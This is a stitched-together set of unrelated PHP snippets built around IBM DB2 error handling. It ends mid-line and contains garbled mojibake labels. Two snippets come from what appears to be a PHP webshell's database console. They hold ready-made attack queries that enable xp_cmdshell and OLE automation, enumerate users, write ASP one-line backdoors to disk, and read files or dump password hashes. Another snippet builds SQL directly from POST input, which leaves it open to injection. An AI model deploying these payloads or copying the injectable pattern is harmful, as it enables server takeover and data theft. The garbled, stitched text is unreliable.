function prepare($sql) { $stmt = @db2_prepare($this->_conn, $sql); if (!$stmt) { throw new DB2Exception(db2_stmt_errormsg()); } return new DB2Statement($stmt); }
/** * This function initializes the class. * * @access public * @override * @param DB_Connection_Driver $connection the connection to be used * @param string $sql the SQL statement to be queried * @param integer $mode the execution mode to be used * @throws Throwable_SQL_Exception indicates that the query failed * * @see * @see * @see */ public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL) { $resource = $connection->get_resource(); $command = @db2_prepare($resource, $sql); if ($command === FALSE) { throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @db2_conn_errormsg($resource))); } if (!@db2_execute($command)) { throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @db2_stmt_errormsg($command))); } $this->command = $command; $this->record = FALSE; }
function dbQuery($query, $show_errors = true, $all_results = true, $show_output = true) { if ($show_errors) { error_reporting(E_ALL); } else { error_reporting(E_PARSE); } // Connect to the IBM DB2 database management system $link = db2_pconnect("testdb", "db2inst1", "testpass"); if (!$link) { die(db2_conn_errormsg()); } // Print results in HTML print "<html><body>\n"; // Print SQL query to test sqlmap '--string' command line option //print "<b>SQL query:</b> " . $query . "<br>\n"; // Perform SQL injection affected query $stmt = db2_prepare($link, $query); $result = db2_execute($stmt); if (!$result) { if ($show_errors) { print "<b>SQL error:</b> " . db2_stmt_errormsg($stmt) . "<br>\n"; } exit(1); } if (!$show_output) { exit(1); } print "<b>SQL results:</b>\n"; print "<table border=\"1\">\n"; while ($line = db2_fetch_array($stmt)) { print "<tr>"; foreach ($line as $col_value) { print "<td>" . $col_value . "</td>"; } print "</tr>\n"; if (!$all_results) { break; } } print "</table>\n"; print "</body></html>"; }
<script src="js/jquery-1.11.3.min.js"></script> </head> <body> <?php //Connect to database require_once "connect_db.php"; require_once "algorithm.php"; //Pull trait information from database $songname = $_POST["name"]; $sql = "SELECT * FROM \"USER04893\" . \"Songs\" WHERE \"title\" = LCASE('" . $songname . "')"; $stmt = db2_exec($conn4, $sql); $losongs; $row; //Fetches the list of similar songs if (!$stmt) { echo "SQL Statement Failed" . db2_stmt_errormsg() . ""; return; } else { $row = db2_fetch_array($stmt); $top = getSongs($row); $losongs = $top; } ?> <br> <center><img src="images/logo.png" height="300px" width="300px" /></center> <table> <tr> <td colspan="3">The song you searched for is: <?php echo ucwords($row[0]); ?>
if (!$result2) { echo "exec errormsg: " . db2_stmt_errormsg($stmt2); die("Failed Query"); } $bid = db2_fetch_array($stmt2); if (!$bid) { continue; // NOT BIDDING ITEM } // I BID // CHECK IF ENDED $sql2 = "SELECT HIGHEST_BID_AMOUNT, END_DATE, END_TIME, HIGHEST_BIDDER FROM " . $computerName . ".BIDS WHERE ITEM_ID = {$itemID} and CURRENT DATE >= END_DATE"; $stmt2 = db2_prepare($conn, $sql2); $result2 = db2_execute($stmt2); if (!$result2) { echo "exec errormsg: " . db2_stmt_errormsg($stmt2); die("Failed Query"); } $bid = db2_fetch_array($stmt2); if (!$bid) { continue; } $endTime = $bid[1] . ' ' . $bid[2]; $curTime = date("Y-m-d H:i:s"); if (strcmp($endTime, $curTime) > 0) { continue; } $endTime = $bid[1] . ' ' . $bid[2]; $highestBid = $bid[0]; $highestBidder = $bid[3]; $condition = $row[3];
/** * Executes a prepared statement. * * @param array $params OPTIONAL Values to bind to parameter placeholders. * @return bool * @throws Zend_Db_Statement_Db2_Exception */ public function _execute(array $params = null) { if (!$this->_stmt) { return false; } $retval = true; if ($params !== null) { $retval = @db2_execute($this->_stmt, $params); } else { $retval = @db2_execute($this->_stmt); } if ($retval === false) { /** * @see Zend_Db_Statement_Db2_Exception */ require_once PHP_LIBRARY_PATH . 'Zend/Db/Statement/Db2/Exception.php'; throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg(), db2_stmt_error()); } $this->_keys = array(); if ($field_num = $this->columnCount()) { for ($i = 0; $i < $field_num; $i++) { $name = db2_field_name($this->_stmt, $i); $this->_keys[] = $name; } } $this->_values = array(); if ($this->_keys) { $this->_values = array_fill(0, count($this->_keys), null); } return $retval; }
function _query($sql, $inputarr = false) { global $php_errormsg; if (isset($php_errormsg)) { $php_errormsg = ''; } $this->_error = ''; if ($inputarr) { if (is_array($sql)) { $stmtid = $sql[1]; } else { $stmtid = db2_prepare($this->_connectionID, $sql); if ($stmtid == false) { $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : ''; return false; } } if (!db2_execute($stmtid, $inputarr)) { if ($this->_haserrorfunctions) { $this->_errorMsg = db2_stmt_errormsg(); $this->_errorCode = db2_stmt_error(); } return false; } } else { if (is_array($sql)) { $stmtid = $sql[1]; if (!db2_execute($stmtid)) { if ($this->_haserrorfunctions) { $this->_errorMsg = db2_stmt_errormsg(); $this->_errorCode = db2_stmt_error(); } return false; } } else { $stmtid = @db2_exec($this->_connectionID, $sql); } } $this->_lastAffectedRows = 0; if ($stmtid) { if (@db2_num_fields($stmtid) == 0) { $this->_lastAffectedRows = db2_num_rows($stmtid); $stmtid = true; } else { $this->_lastAffectedRows = 0; } if ($this->_haserrorfunctions) { $this->_errorMsg = ''; $this->_errorCode = 0; } else { $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : ''; } } else { if ($this->_haserrorfunctions) { $this->_errorMsg = db2_stmt_errormsg(); $this->_errorCode = db2_stmt_error(); } else { $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : ''; } } return $stmtid; }
protected function _rawQuery($sql) { $conn = $this->_db->getConnection(); $result = @db2_exec($conn, $sql); if (!$result) { $e = db2_stmt_errormsg(); throw new Db\Exception("SQL error for \"{$sql}\": {$e}"); } }
function otherdb() { $db = isset($_GET['db']) ? $_GET['db'] : 'ms'; print <<<END <form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data"> <div class="actall"> <a href="?s=gg&db=ms">   MSSQL  </a> <a href="?s=gg&db=ora">   Oracle  </a> <a href="?s=gg&db=ifx">   InforMix  </a> <a href="?s=gg&db=fb">   FireBird  </a> <a href="?s=gg&db=db2">  DB2  </a></div></form> END; if ($db == "ms") { $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******'; $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : ''; $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; $msaction = isset($_POST['action']) ? $_POST['action'] : ''; $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; $msquery = stripslashes($msquery); print <<<END <div class="actall"> <form method="POST" name="msform" action="?s=gg&db=ms"> Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px"> User:<input type="text" name="msuser" value="{$msuser}" style="width:100px"> Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px"> Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br> <script language="javascript"> function msFull(i){ \tStr = new Array(11); \tStr[0] = ""; \tStr[1] = "select @@version;"; \tStr[2] = "select name from sysdatabases;"; \tStr[3] = "select name from sysobject where type='U';"; \tStr[4] = "select name from syscolumns where id=Object_Id('table_name');"; \tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');"; \tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');"; \tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; \tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; \tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; \tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';"; \tStr[11] = "Declare @s int;exec sp_oacreate '',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';"; \tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' "; \tmsform.mssql.value = Str[i]; \treturn true; } </script> <textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br> <select onchange="return msFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">��ʾ�汾</option> \t<option value="2">���ݿ�</option> \t<option value="3">����</option> \t<option value="4">�ֶ�</option> \t<option value="5">sp_oacreate</option> \t<option value="6">xp_cmdshell</option> \t<option value="7">xp_cmdshell(2005)</option> \t<option value="8">sp_oacreate(2005)</option> \t<option value="9">����openrowset(2005)</option> \t<option value="10">xp_cmdshell exec</option> \t<option value="10">sp_oamethod exec</option> \t<option value="11">sp_makewebtask</option> </select> <input type="hidden" name="action" value="msquery"> <input class="bt" type="submit" value="Query"></form></div> END; if ($msaction == 'msquery') { $msconn = mssql_connect($mshost, $msuser, $mspass); mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message()); $msresult = mssql_query($msquery) or die(mssql_get_last_message()); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n"; } echo "</tr>\n"; mssql_data_seek($result, 0); while ($msrow = mssql_fetch_row($msresult)) { echo "<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td>' . "{$msrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; mssql_free_result($msresult); mssql_close(); } } elseif ($db == "ora") { $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******'; $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******'; $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; $oraaction = isset($_POST['action']) ? $_POST['action'] : ''; $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; $oraquery = stripslashes($oraquery); print <<<END <form method="POST" name="oraform" action="?s=gg&db=ora"> <div class="actall"> Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px"> Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px"> User:<input type="text" name="orauser" value="{$orauser}" style="width:80px"> Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px"> SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br> <script language="javascript"> function oraFull(i){ Str = new Array(5); \tStr[0] = ""; \tStr[1] = "select version();"; \tStr[2] = "SELECT NAME FROM V{$DATABASE}"; \tStr[3] = "select * From all_objects where object_type='TABLE'"; \tStr[4] = "select column_name from user_tab_columns where table_name='table1'"; \toraform.orasql.value = Str[i]; \treturn true; } </script> <textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br> <select onchange="return oraFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">��ʾ�汾</option> \t<option value="2">���ݿ�</option> \t<option value="3">����</option> \t<option value="4">�ֶ�</option> </select> <input type="hidden" name="action" value="myquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($oraaction == 'oraquery') { $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror()); $oraresult = ociparse($oralink, $oraquery) or die(ocierror()); $orarow = oci_fetch_row($oraresult); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < oci_num_fields($oraresult); $i++) { echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n"; } echo "</tr>\n"; ociresult($oraresult, 0); while ($orarow = ora_fetch_row($oraresult)) { echo "<tr>\n"; for ($i = 0; $i < ora_num_fields($result); $i++) { echo '<td>' . "{$orarow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; oci_free_statement($oraresult); ocilogoff(); } } elseif ($db == "ifx") { $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******'; $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******'; $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; $ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; $ifxquery = stripslashes($ifxquery); print <<<END <form method="POST" name="ifxform" action="?s=gg&db=ifx"> <div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px"> User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px"> Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br> <script language="javascript"> function ifxFull(i){ Str = new Array(11); \tStr[0] = ""; \tStr[1] = "select dbservername from sysobjects;"; \tStr[2] = "select name from sysdatabases;"; \tStr[3] = "select tabname from systables;"; \tStr[4] = "select colname from syscolumns where tabid=n;"; \tStr[5] = "select username,usertype,password from sysusers;"; \tifxform.ifxsql.value = Str[i]; \treturn true; } </script> <textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br> <select onchange="return ifxFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">���ݿ�����������</option> \t<option value="1">���ݿ�</option> \t<option value="2">����</option> \t<option value="3">�ֶ�</option> \t<option value="4">hashes</option> </select> <input type="hidden" name="action" value="ifxquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($ifxaction == 'ifxquery') { $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg()); $ifxrow = ifx_fetch_row($ifxresult); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n"; } echo "</tr>\n"; mysql_data_seek($ifxresult, 0); while ($ifxrow = ifx_fetch_row($ifxresult)) { echo "<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td>' . "{$ifxrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; ifx_free_result($ifxresult); ifx_close(); } } elseif ($db == "db2") { $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******'; $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******'; $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; $db2action = isset($_POST['action']) ? $_POST['action'] : ''; $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; $db2query = stripslashes($db2query); print <<<END <form method="POST" name="db2form" action="?s=gg&db=db2"> <div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px"> Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px"> User:<input type="text" name="db2user" value="{$db2user}" style="width:100px"> Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px"> Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br> <script language="javascript"> function db2Full(i){ Str = new Array(4); \tStr[0] = ""; \tStr[1] = "select schemaname from syscat.schemata;"; \tStr[2] = "select name from sysibm.systables;"; \tStr[3] = "select colname from syscat.columns where tabname='table_name';"; \tStr[4] = "db2 get db cfg for db_name;"; db2form.db2sql.value = Str[i]; return true; } </script> <textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br> <select onchange="return db2Full(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">���ݿ�</option> \t<option value="1">����</option> \t<option value="2">�ֶ�</option> \t<option value="3">���ݿ�����</option> </select> <input type="hidden" name="action" value="db2query"> <input class="bt" type="submit" value="Query"></div></form> END; if ($myaction == 'db2query') { $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg()); $db2row = db2_fetch_row($db2result); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n"; } echo "</tr>\n"; while ($db2row = db2_fetch_row($db2result)) { echo "<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td>' . "{$db2row[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; db2_free_result($db2result); db2_close(); } } elseif ($db == "fb") { $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; $fbpath = str_replace("\\\\", "\\", $fbpath); $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******'; $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******'; $fbaction = isset($_POST['action']) ? $_POST['action'] : ''; $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; $fbquery = stripslashes($fbquery); print <<<END <form method="POST" name="fbform" action="?s=gg&db=fb"> <div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px"> Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px"> User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px"> Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/> <script language="javascript"> function fbFull(i){ Str = new Array(5); \tStr[0] = ""; \tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;"; \tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';"; \tStr[3] = "input 'D:\\createtable.sql';"; \tStr[4] = "shell netstat -an;"; fbform.fbsql.value = Str[i]; return true; } </script> <textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br> <select onchange="return fbFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">����</option> \t<option value="2">�ֶ�</option> \t<option value="3">����sql</option> \t<option value="4">shell</option> </select> <input type="hidden" name="action" value="fbquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($fbaction == 'fbquery') { $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg()); $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg()); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n"; } echo "</tr>\n"; ibase_field_info($fbresult, 0); while ($fbrow = ibase_fetch_row($fbresult)) { echo "<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td>' . "{$fbrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; ibase_free_result($fbresult); ibase_close(); } } }
/** * Executes a prepared statement. * * @param array $params OPTIONAL Values to bind to parameter placeholders. * @return bool * @throws \Zend\Db\Statement\Db2Exception */ public function _execute(array $params = null) { if (!$this->_stmt) { return false; } $retval = true; if ($params !== null) { $retval = @db2_execute($this->_stmt, $params); } else { $retval = @db2_execute($this->_stmt); } if ($retval === false) { throw new Db2Exception(db2_stmt_errormsg(), db2_stmt_error()); } $this->_keys = array(); if ($field_num = $this->columnCount()) { for ($i = 0; $i < $field_num; $i++) { $name = db2_field_name($this->_stmt, $i); $this->_keys[] = $name; } } $this->_values = array(); if ($this->_keys) { $this->_values = array_fill(0, count($this->_keys), null); } return $retval; }
/** * This function returns the last error string. * * @access public * @author Thorsten Rinne <*****@*****.**> * @since 2005-04-16 */ function error() { return db2_stmt_errormsg($this->conn); }
public static function errorMessage($conn) { return db2_stmt_errormsg(); }
/** * error() * * This function returns the last error string. * * @access public * @author Thorsten Rinne <*****@*****.**> * @since 2005-04-16 */ function error() { return db2_stmt_errormsg(); }
function otherdb() { $db = isset($_GET['db']) ? $_GET['db'] : ''; print <<<END <form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data"> <div class="actall"><a href="?s=w">   psotgresql  </a> <a href="?s=w&db=ms">   mssql  </a> <a href="?s=w&db=ora">   oracle  </a> <a href="?s=w&db=ifx">   informix  </a> <a href="?s=w&db=fb">   firebird  </a> <a href="?s=w&db=db2">  db2  </a></div></form> END; if ($db == "ms") { $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******'; $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '******'; $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; $msaction = isset($_POST['action']) ? $_POST['action'] : ''; $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; $msquery = stripslashes($msquery); print <<<END <form method="POST" name="msform" action="?s=w&db=ms"> <div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px"> User:<input type="text" name="msuser" value="{$msuser}" style="width:100px"> Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px"> Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br> <script language="javascript"> function msFull(i){ \tStr = new Array(11); Str[0] = ""; \tStr[1] = "select @@version;"; Str[2] = "select name from sysdatabases;"; Str[3] = "select name from sysobject where type='U';"; Str[4] = "select name from syscolumns where id=Object_Id('table_name');"; Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');"; \tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');"; \tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; Str[10] = "Exec master.dbo.xp_cmdshell 'net user';"; Str[11] = "Declare @s int;exec sp_oacreate '',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';"; \tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' "; msform.mssql.value = Str[i]; \treturn true; } </script> <textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br> <select onchange="return msFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">version</option> <option value="2">databases</option> <option value="3">tables</option> <option value="4">columns</option> <option value="5">add sp_oacreate</option> \t<option value="6">add xp_cmdshell</option> \t<option value="7">add xp_cmdshell(2005)</option> <option value="8">add sp_oacreate(2005)</option> <option value="9">open openrowset(2005)</option> <option value="10">xp_cmdshell exec</option> <option value="10">sp_oamethod exec</option> <option value="11">sp_makewebtask</option> </select> <input type="hidden" name="action" value="msquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($msaction == 'msquery') { $msconn = mssql_connect($mshost, $msuser, $mspass); mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message()); $msresult = mssql_query($msquery) or die(mssql_get_last_message()); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td bgcolor="#228B22"><b>' . mssql_field_name($msresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; mssql_data_seek($result, 0); while ($msrow = mssql_fetch_row($msresult)) { echo "<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$msrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; mssql_free_result($msresult); mssql_close(); } } elseif ($db == "ora") { $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******'; $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******'; $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; $oraaction = isset($_POST['action']) ? $_POST['action'] : ''; $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; $oraquery = stripslashes($oraquery); print <<<END <form method="POST" name="oraform" action="?s=w&db=ora"> <div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px"> Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px"> User:<input type="text" name="orauser" value="{$orauser}" style="width:80px"> Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px"> SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br> <script language="javascript"> function oraFull(i){ \tStr = new Array(8); Str[0] = ""; \tStr[1] = "select version();"; Str[2] = "show databases;"; Str[3] = "show tables from db_name;"; Str[4] = "show columns from table_name;"; Str[5] = "select user,password from mysql.user;"; \tStr[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);"; \tStr[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'"; \toraform.orasql.value = Str[i]; \treturn true; } </script> <textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br> <select onchange="return oraFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">version</option> <option value="2">databases</option> <option value="3">tables</option> <option value="4">columns</option> <option value="5">hashes</option> \t<option value="6">load_file</option> \t<option value="7">into outfile</option> </select> <input type="hidden" name="action" value="myquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($oraaction == 'oraquery') { $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror()); $oraresult = ociparse($oralink, $oraquery) or die(ocierror()); $orarow = oci_fetch_row($oraresult); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < oci_num_fields($oraresult); $i++) { echo '<td bgcolor="#228B22"><b>' . oci_field_name($oraresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; ociresult($oraresult, 0); while ($orarow = ora_fetch_row($oraresult)) { echo "<tr>\n"; for ($i = 0; $i < ora_num_fields($result); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$orarow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; oci_free_statement($oraresult); ocilogoff(); } } elseif ($db == "ifx") { $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******'; $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******'; $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; $ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; $ifxquery = stripslashes($ifxquery); print <<<END <form method="POST" name="ifxform" action="?s=w&db=ifx"> <div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px"> User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px"> Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br> <script language="javascript"> function ifxFull(i){ \tStr = new Array(11); Str[0] = ""; \tStr[1] = "select dbservername from sysobjects;"; Str[2] = "select name from sysdatabases;"; Str[3] = "select tabname from systables;"; Str[4] = "select colname from syscolumns where tabid=n;"; Str[5] = "select username,usertype,password from sysusers;"; \tifxform.ifxsql.value = Str[i]; \treturn true; } </script> <textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br> <select onchange="return ifxFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">dbservername</option> <option value="1">databases</option> <option value="2">tables</option> <option value="3">columns</option> <option value="4">hashes</option> </select> <input type="hidden" name="action" value="ifxquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($ifxaction == 'ifxquery') { $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg()); $ifxrow = ifx_fetch_row($ifxresult); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td bgcolor="#228B22"><b>' . ifx_fieldproperties($ifxresult); echo "</b></td>\n"; } echo "</tr>\n"; mysql_data_seek($ifxresult, 0); while ($ifxrow = ifx_fetch_row($ifxresult)) { echo "<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$ifxrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; ifx_free_result($ifxresult); ifx_close(); } } elseif ($db == "db2") { $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; $db2user = isset($_POST['db2user']) ? $_POST['db2user'] 